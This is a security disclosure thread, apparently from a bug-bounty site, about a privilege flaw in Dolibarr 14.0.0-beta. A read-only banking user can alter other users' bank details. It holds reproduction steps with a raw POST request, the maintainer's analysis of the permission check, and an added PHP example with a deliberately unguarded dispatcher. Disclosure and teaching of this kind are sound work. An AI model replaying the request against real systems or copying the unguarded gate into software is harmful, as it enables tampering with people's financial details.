Improper Handling of Insufficient Privileges in dolibarr/dolibarr


Reported on

May 24th 2021


An unprivileged user can attach a bank account to another user.


A user who has no access at all to the "Users & Groups" module can update other users' bank details.


Dolibarr 14.0.0-beta


1. From the admin account, create user B as a normal user.
Then give user B only the permission below in the Banks and cash module:

---> Read financial accounts

Do not give user B any permission in the Users & Groups module.

So user B cannot see or update any user's details, and in particular should not be able to update any user's bank details.

2. Still from the admin account, go to the HR and Bank tab of any other user by visiting a URL like http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1,
and add bank details there.

3. Finally, log in as user B and send the request below to update those bank details. (Only the headers are reproduced here; the Referer shows the edit form for bankid=1 with action=edit.)

POST /dolibarr-develop/htdocs/user/bank.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1&bankid=1&action=edit
Cookie:  DOLSESSID_8e8881ad773ee74880c453666c22c288=kd3isa1fp3c53e419fgn79lilo
Upgrade-Insecure-Requests: 1


So user B, who has no "Users & Groups" permission at all and only read permission in Banks and cash, can update another user's bank details.



According to the code of v14.0.2, the controller for action=update to update a bank is protected with if ($action == 'update' && !$cancel && $permissiontoaddbankaccount) { so user B should have write permission from at least one of the list $permissiontoaddbankaccount = (!empty($user->rights->salaries->write) || !empty($user->rights->hrm->employee->write) || !empty($user->rights->user->creer));

Can you check?
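To make the permission gate quoted above concrete, here is an added example written for this page (it is not Dolibarr's own code and not taken from user/bank.php): a minimal PHP dispatcher in the shape of a Dolibarr controller, once gated only on the action name and once gated with the exact $permissiontoaddbankaccount condition the maintainer quotes. The $user->rights tree mirrors Dolibarr's naming; the functions make_user, handle_update_vulnerable and handle_update_fixed, the right name banque->lire standing in for "Read financial accounts", and the POST array are assumptions made for the example, since the report does not reproduce its request body.

```php
<?php
// Added example for this page, not Dolibarr code. It models the write gate
// on a bank-account update with the condition quoted from v14.0.2, and
// contrasts it with a dispatcher that only looks at the action name.

// Build a stdClass tree shaped like Dolibarr's $user->rights (assumed shape;
// only the rights used by the gate and by the report are modelled).
function make_user(array $rights): stdClass {
    $u = new stdClass();
    $u->rights = new stdClass();
    $u->rights->salaries = new stdClass();
    $u->rights->salaries->write = $rights['salaries_write'] ?? 0;
    $u->rights->hrm = new stdClass();
    $u->rights->hrm->employee = new stdClass();
    $u->rights->hrm->employee->write = $rights['hrm_employee_write'] ?? 0;
    $u->rights->user = new stdClass();
    $u->rights->user->creer = $rights['user_creer'] ?? 0;
    $u->rights->banque = new stdClass();
    $u->rights->banque->lire = $rights['banque_lire'] ?? 0; // "Read financial accounts" (assumed name)
    return $u;
}

// The condition the maintainer quotes from the v14.0.2 controller.
function permission_to_add_bank_account(stdClass $user): bool {
    return (!empty($user->rights->salaries->write)
        || !empty($user->rights->hrm->employee->write)
        || !empty($user->rights->user->creer));
}

// Dispatcher gated only on the action name. This is the shape that yields the
// behaviour the report describes; it is an illustration, not the beta's code.
function handle_update_vulnerable(stdClass $user, array $post): string {
    $action = $post['action'] ?? '';
    $cancel = !empty($post['cancel']);
    if ($action == 'update' && !$cancel) {
        return 'updated';   // write path reached regardless of $user->rights
    }
    return 'no-op';
}

// Dispatcher gated with the quoted condition: the write path is reached only
// when the caller holds one of the three write rights.
function handle_update_fixed(stdClass $user, array $post): string {
    $action = $post['action'] ?? '';
    $cancel = !empty($post['cancel']);
    $permissiontoaddbankaccount = permission_to_add_bank_account($user);
    if ($action == 'update' && !$cancel && $permissiontoaddbankaccount) {
        return 'updated';
    }
    if ($action == 'update' && !$permissiontoaddbankaccount) {
        return 'forbidden'; // Dolibarr would stop the request with accessforbidden() here
    }
    return 'no-op';
}

// User B from the report: read-only on Banks and cash, nothing on Users & Groups.
$userB = make_user(['banque_lire' => 1]);
// A caller who does hold "create/modify users" (user->creer).
$admin = make_user(['banque_lire' => 1, 'user_creer' => 1]);
// Constructed POST body: the report only shows the request headers.
$post = ['action' => 'update'];

printf("user B, action-only gate: %s\n", handle_update_vulnerable($userB, $post));
printf("user B, permission gate:  %s\n", handle_update_fixed($userB, $post));
printf("admin,  permission gate:  %s\n", handle_update_fixed($admin, $post));
```

Run it with php on the command line: user B reaches the write path through the action-only dispatcher and is refused by the gated one, while the caller holding user->creer is accepted by both. The point the maintainer makes is the third operand of the condition: "action == update" describes what the request asks for, and only $permissiontoaddbankaccount describes what the caller may do, so a read-only bank right never satisfies it.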

Laurent Destailleur validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
Laurent Destailleur confirmed that a fix has been merged on bb64a2 a year ago
Laurent Destailleur has been awarded the fix bounty